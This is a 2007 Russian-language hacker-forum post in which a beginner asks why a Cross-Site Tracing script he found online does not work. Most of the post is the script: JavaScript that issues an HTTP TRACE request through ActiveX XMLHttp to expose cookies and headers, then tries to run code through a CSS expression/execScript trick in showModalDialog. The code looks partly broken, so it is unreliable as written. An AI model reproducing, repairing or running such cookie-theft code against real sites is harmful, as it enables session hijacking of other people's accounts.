18.08.2007, 05:37
|
|
Новичок
Регистрация: 12.08.2007
Сообщений: 5
С нами:
9866752
Репутация:
0
|
|
Trace атака
Доброго времени суток уважаемые Хакеры!
На одном сайте XSpider написал, что возможно атака с помощью метода TRACE.
в инете нашел такой код
Код:
<script>
function xssDomainTraceRequest(){
var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
var exampleCode = xmlHttp;
xmlHttp.open ("TRACE","http://site.ru",false);
xmlHttp.send ();
xmlDoc=xmlHttp.responseText;
alert (xmlDoc);
var target = "http://site.ru";
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
var readyCode = 'font-size: expression(execScript(decodeURIComponent("' +
cExampleCode + '")))';
showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE="BUTTON" OnClick="xssDomainTraceRequest()" VALUE="Show Cookie
Information Using TRACE">
подставляю за место http://site.ru мой сайт.
заливаю к себе на хостинг, жму кнопку и ничего ни в опере, ни в IE не нажимается... Что я делаю не так? Подскажите пожалуйста. |
|
|